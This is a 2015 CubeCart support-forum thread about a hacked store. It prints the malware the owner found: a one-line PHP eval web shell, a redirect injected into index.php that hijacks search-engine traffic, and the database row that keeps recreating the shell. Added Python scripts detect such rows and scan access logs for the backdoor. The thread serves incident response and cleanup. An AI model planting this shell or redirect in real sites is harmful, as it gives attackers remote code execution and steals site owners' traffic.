jpayam Posted July 25, 2015

Hello,

I use the latest CubeCart. I see a PHP file (snippet_892d667b445c9ebb6888107b8124a8.php) in the /includes/extra directory which includes the code below:

    <?php eval($_REQUEST["H6GrD"]);?>

This file is recreated automatically again and again after I delete it!!! This code adds the code below to my index.php file:

    if (preg_match("#(google|googlebot|slurp@inktomi|yahoo! slurp|msnbot)#si", $_SERVER['HTTP_USER_AGENT'])) {
        header("HTTP/1.1 301 Moved Permanently");
        header("Location: http://www.reehair.com/");
        exit;
    }
    if (preg_match("#(www\.google)#si", $_SERVER['HTTP_REFERER'])) {
        header("HTTP/1.1 301 Moved Permanently");
        header("Location: http://www.reehair.com/");
        exit;
    }

Now I am losing my SEO links in search engines.

Thanks in advance for any help.

ayz1 Posted July 25, 2015

Seems similar to this: https://forums.cubecart.com/topic/50036-site-hijacked-by-modifying-controllerscontrollerincphp/

havenswift-hosting Posted July 26, 2015

This is exactly the same as that other report and is something we have seen on quite a few sites over the last 7 to 10 days. There is absolutely no point in simply deleting the code or replacing the file without discovering and plugging the mechanism through which they are gaining access, as it is an automated system that looks for and inserts this code.

This has been found to be caused mostly by having old and insecure versions of other software installed within the same hosting account, such as forum (phpBB) or CMS (WordPress and Joomla) - if you have any other software installed alongside your CubeCart software you MUST always keep this right up to date, as they have all had serious security issues disclosed and fixed over the recent months. Any software installed but not being used should be deleted and not just moved. It can also be caused by insecure hosting where access is gained through another account with a vulnerability, which is common with cheap shared hosting - if you value your CubeCart store then get decent hosting!

Ian

jpayam Posted July 26, 2015

We use a VPS for this store. We do not have any other scripts, only one site with the latest CubeCart script. The PHP version is the latest 5.4 with Suhosin enabled, and all dangerous PHP functions are disabled in the php.ini file. CSF is active, and ModSecurity with the latest COMODO rules is active. ClamAV and ConfigServer eXploit Scanner scans did not find any fingerprint matches. ConfigServer eXploit Scanner only found one suspicious match:

    '/home/XXXXXXXXXX/public_html/cache/75590.sql.1efdd7b03693b5f7a93ef2d228d5e98c.cache'
    Regular expression match = [eval\(\$_REQUEST\[]

I emptied the cache folder and even disabled the cache temporarily, but the problem is still not fixed.

havenswift-hosting Posted July 26, 2015

CSF, cxs and mod_security wouldn't pick this type of file change up - you will need to analyse server logs to determine the method of access.

Ian

jpayam Posted July 26, 2015

Yes, thanks.

The problem is from my database; it seems it was infected before I installed ModSecurity. I installed a fresh CubeCart on another site and it works without a problem, but when I import my database to the new site I see the problem again (file snippet_892d667b445c9ebb6888107b8124a8.php in the /includes/extra directory).

How can I clean my database? I want to keep the store settings, products, customers and orders.

jpayam Posted July 26, 2015

The code below was in my database. I just cleaned it and it seems the problem is fixed.

    -- Dumping data for table `CubeCart_code_snippet`
    --
    LOCK TABLES `CubeCart_code_snippet` WRITE;
    /*!40000 ALTER TABLE `CubeCart_code_snippet` DISABLE KEYS */;
    INSERT INTO `CubeCart_code_snippet` VALUES (1,1,'snippetH6GrD','Snippet','controller.index','<?php eval($_REQUEST[\"H6GrD\"]);?>','','',3);
    /*!40000 ALTER TABLE `CubeCart_code_snippet` ENABLE KEYS */;
    UNLOCK TABLES;

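A check for the kind of row found above, as an added example that is not part of the original thread or CubeCart's own code: it scans a mysqldump file for `*code_snippet` INSERT rows in which any field passes a request superglobal straight to eval() or assert(), which is slightly broader than the single eval($_REQUEST[...]) case posted. The first sample row is the INSERT from the post, the second is constructed, and treating the first field as the row id is an assumption.

```python
import re

# eval()/assert() fed straight from a request superglobal (broader than the thread's case).
SUSPICIOUS = re.compile(r"\b(?:eval|assert)\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b", re.I)
INSERT_RE = re.compile(r"INSERT INTO `(\w*code_snippet)` VALUES", re.I)

def split_rows(sql):
    """Decode "(a,'b'),(c,'d');" into lists of fields, honouring quotes/escapes."""
    rows, row, field, in_str, i = [], None, [], False, 0
    while i < len(sql):
        ch = sql[i]
        if in_str:
            if ch == "\\" and i + 1 < len(sql):        # \" or \' -> literal char
                field.append(sql[i + 1]); i += 2; continue
            if ch == "'" and sql[i + 1:i + 2] == "'":  # '' -> literal quote
                field.append("'"); i += 2; continue
            if ch == "'":
                in_str = False
            else:
                field.append(ch)
        elif ch == "'":
            in_str = True
        elif row is None:
            if ch == "(":
                row, field = [], []
            elif ch == ";":                            # end of this INSERT statement
                break
        elif ch in ",)":
            row.append("".join(field)); field = []
            if ch == ")":
                rows.append(row); row = None
        else:
            field.append(ch)
        i += 1
    return rows

def find_backdoored_snippets(dump):
    """Return (table, first field, offending field) for each suspicious row."""
    hits = []
    for m in INSERT_RE.finditer(dump):
        for row in split_rows(dump[m.end():]):
            bad = next((f for f in row if SUSPICIOUS.search(f)), None)
            if bad:
                hits.append((m.group(1), row[0], bad))  # row[0] assumed to be the id
    return hits

# Row 1 is the INSERT posted in the thread; row 2 is constructed and benign.
SAMPLE_DUMP = r"""INSERT INTO `CubeCart_code_snippet` VALUES (1,1,'snippetH6GrD','Snippet','controller.index','<?php eval($_REQUEST[\"H6GrD\"]);?>','','',3),(2,1,'banner','Banner','controller.index','<?php $note = \'Free shipping; today\'; ?>','','',1);"""
print(find_backdoored_snippets(SAMPLE_DUMP))
```

Running it against a dump before importing the database into a fresh install shows whether the snippet table would recreate the file.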
bsmither Posted July 26, 2015

On your database server, would you happen to have it set to log to a General Log?

I can understand if it's not. Without some highly disciplined routine maintenance (or a cron job) to rotate out the logs, it could get quite large.

If you do have a General Log for the database server, you may be able to tell exactly when this record was first inserted into the database, and examine all the nearby database activity. Then correlate the date/time to the site's web server access log.

There might even be an entry in CubeCart's Staff Access Log for that date/time.

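The access-log side of the correlation described in the replies above, as an added example that is not part of the original thread: it pulls requests from a combined-format access log that carry the backdoor's parameter name in the URL or request a snippet file directly, sorted by time so the earliest hit can be compared with database and staff-log timestamps. The log lines, IP addresses, times and the snippet file name in the sample are constructed.

```python
import re
from datetime import datetime

# Apache/nginx "combined" format: client ip, [timestamp], "METHOD url proto", status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
SNIPPET_PATH = re.compile(r"/includes/extra/snippet_[0-9a-f]+\.php", re.I)

def backdoor_requests(lines, param="H6GrD"):
    """Return time-sorted (when, ip, method, status, reason) for suspect requests.

    Only the URL is inspected: a parameter sent in a POST body or a cookie
    is not written to the access log and will not be found this way.
    """
    param_re = re.compile(r"[?&]" + re.escape(param) + r"=")
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, ts, method, url, status = m.groups()
        if param_re.search(url):
            reason = "backdoor parameter in query string"
        elif SNIPPET_PATH.search(url):
            reason = "direct request to snippet file"
        else:
            continue
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        hits.append((when, ip, method, status, reason))
    return sorted(hits)

# Constructed sample lines (documentation IP ranges, made-up times and file name).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Jul/2015:13:40:02 +0000] "GET /index.php?_a=category&cat_id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Jul/2015:13:44:31 +0000] "GET /includes/extra/snippet_0123abcd.php HTTP/1.1" 200 0',
    '198.51.100.7 - - [24/Jul/2015:13:44:10 +0000] "POST /index.php?H6GrD=REDACTED HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for when, ip, method, status, reason in backdoor_requests(SAMPLE_LOG):
        print(when.isoformat(), ip, method, status, reason)
```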
jpayam Posted July 26, 2015

I do not have a log for MySQL on the server. My site was hacked two times, and every time I see the System Error Log entry below within the CubeCart panel:

    Yesterday, 13:44 [Deprecated] /home/XXXXXXXXXXXXXXX/domains/XXXXXXXXXXX/public_html/includes/extra/snippet_892d667b445c9ebb6888107b8121a8.php(1) : eval()'d code(1) : eval()'d code:1 - Function set_magic_quotes_runtime() is deprecated